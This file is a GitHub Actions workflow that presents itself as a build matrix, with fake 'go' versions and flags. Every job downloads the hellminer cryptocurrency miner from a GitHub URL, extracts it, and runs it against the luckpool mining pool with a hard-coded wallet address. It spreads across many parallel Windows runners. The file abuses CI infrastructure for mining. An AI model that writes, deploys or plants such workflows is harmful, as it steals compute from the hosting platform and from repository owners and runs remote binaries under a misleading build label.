name: Nyusu

on: [workflow_dispatch]

jobs:
  build:
    name: Haha
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_win64_avx2.zip -OutFile hellminer_cpu_win64_avx2.zip
    - name: Extract
      run: Expand-Archive hellminer_cpu_win64_avx2.zip
    - name: RUNNING
      run: cd hellminer_cpu_win64_avx2 && .\hellminer.exe -c stratum+tcp://na.luckpool.net:3956 -u RBnvE5PySsdZCBEBbXoWEocrEr1uWq4dJJ -p x --cpu 8
    - name: DONE
      run: exit
